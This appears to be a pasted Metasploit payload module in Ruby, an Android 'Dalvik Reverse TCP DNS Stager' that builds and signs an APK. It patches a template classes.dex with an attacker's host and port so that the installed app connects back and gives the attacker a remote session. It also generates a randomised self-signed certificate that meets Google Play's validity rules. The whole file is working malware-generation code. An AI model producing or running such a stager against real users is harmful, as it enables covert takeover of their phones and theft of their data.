Edszx

reverse_tcp_dns

May 20th, 2014
  1. ##
  2. # This module requires Metasploit: http://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5.  
  6. require 'msf/core'
  7. require 'msf/core/handler/reverse_tcp'
  8. require 'msf/base/sessions/command_shell'
  9. require 'msf/base/sessions/command_shell_options'
  10.  
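module Metasploit3

  include Msf::Payload::Stager
  include Msf::Payload::Dalvik

  # Registers the stager's metadata with the framework.
  #
  # @param info [Hash] module info supplied by the framework; merged with the
  #   defaults below via merge_info before being handed to the superclass
  def initialize(info = {})
    super(merge_info(info,
      'Name'        => 'Dalvik Reverse TCP DNS Stager',
      'Description' => 'Connect back stager',
      'Author'      => 'timwr (DNS port by Edszx)',
      'License'     => MSF_LICENSE,
      'Platform'    => 'android',
      'Arch'        => ARCH_DALVIK,
      'Handler'     => Msf::Handler::ReverseTcp,
      'Stager'      => {'Payload' => ""}
    ))
  end

  # Overwrites a fixed-width, space-padded placeholder inside +data+ in place
  # with +input+, right-padding +input+ with spaces so the total length of the
  # buffer does not change (the .dex is patched as raw bytes, so its internal
  # offsets must stay where they are).
  #
  # @param data [String] buffer to patch; mutated through gsub!
  # @param placeholder [String] the exact padded slot to look for
  # @param input [String] the value to write into the slot
  # @return [String, nil] +data+ when a substitution happened, nil when the
  #   placeholder was not present (gsub! semantics); callers ignore the result
  # @raise [ArgumentError] when +input+ is longer than the slot. Before this
  #   check the same condition surfaced as an opaque "negative argument" error
  #   from String#* on the padding expression.
  def string_sub(data, placeholder, input)
    overflow = input.length - placeholder.length
    if overflow > 0
      raise ArgumentError,
            "#{input.inspect} is #{overflow} character(s) longer than its " \
            "#{placeholder.length}-character slot"
    end
    # gsub! interprets backslash sequences in the replacement string; the
    # values patched in here (a host and a port) are not expected to contain any.
    data.gsub!(placeholder, input + ' ' * -overflow)
  end

  # Builds the signed APK (a JAR) carrying the patched classes.dex.
  #
  # The template classes.dex under data/android/apk contains two space-padded
  # slots, '127.0.0.1' and '4444', which are patched in place with LHOST and
  # LPORT. LHOST is read with to_str, so a hostname rather than a literal IP
  # is presumably acceptable in this variant — a long hostname is therefore
  # the most likely way to overflow its slot.
  #
  # @param opts [Hash] not used here; kept so the signature matches the
  #   framework's other generate_jar implementations
  # @return [Rex::Zip::Jar] the built and signed archive
  # @raise [ArgumentError] if LHOST or LPORT does not fit its slot
  def generate_jar(opts = {})
    jar = Rex::Zip::Jar.new

    # Resolve the template directory once; the original read classes.dex via
    # Msf::Config::InstallRoot + 'data' and the resources via
    # Msf::Config.data_directory, which name the same location.
    apk_dir = File.join(Msf::Config.data_directory, 'android', 'apk')

    classes = File.read(File.join(apk_dir, 'classes.dex'), {:mode => 'rb'})

    string_sub(classes, '127.0.0.1                       ', datastore['LHOST'].to_str) if datastore['LHOST']
    string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
    # fix_dex_header comes from Msf::Payload::Dalvik (not visible here);
    # presumably it recomputes the header fields invalidated by the patch above.
    jar.add_file("classes.dex", fix_dex_header(classes))

    files = [
      [ "AndroidManifest.xml" ],
      [ "res", "drawable-mdpi", "icon.png" ],
      [ "res", "layout", "main.xml" ],
      [ "resources.arsc" ]
    ]

    jar.add_files(files, apk_dir)
    jar.build_manifest

    key, cert = signing_key_and_cert
    jar.sign(key, cert, [cert])

    jar
  end

  private

  # Generates the per-build self-signed certificate (and its RSA key) used to
  # sign the APK.
  #
  # The resulting certificate is fully determined by this method, which is
  # useful to know when characterising APKs produced by this stager: an
  # RSA-1024 key, X.509 v3, serial 1, subject == issuer with every DN
  # component set to "Unknown", a not_before within the last three years and
  # a not_after between 2033-10-22 and 2038-01-19 (0x7fffffff) UTC.
  #
  # @return [Array(OpenSSL::PKey::RSA, OpenSSL::X509::Certificate)] the
  #   private key and the certificate it signs
  def signing_key_and_cert
    x509_name = OpenSSL::X509::Name.parse(
      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
    )
    key  = OpenSSL::PKey::RSA.new(1024)
    cert = OpenSSL::X509::Certificate.new
    cert.version = 2   # OpenSSL counts from 0: this is an X.509 v3 certificate
    cert.serial = 1
    cert.subject = x509_name
    cert.issuer = x509_name
    cert.public_key = key.public_key

    # Some time within the last 3 years
    cert.not_before = Time.now - rand(3600*24*365*3)

    # From http://developer.android.com/tools/publishing/app-signing.html
    # """
    # A validity period of more than 25 years is recommended.
    #
    # If you plan to publish your application(s) on Google Play, note
    # that a validity period ending after 22 October 2033 is a
    # requirement. You can not upload an application if it is signed
    # with a key whose validity expires before that date.
    # """
    # The timestamp 0x78045d81 equates to 2033-10-22 00:00:01 UTC
    cert.not_after = Time.at( 0x78045d81  + rand( 0x7fffffff - 0x78045d81 ))

    [key, cert]
  end

end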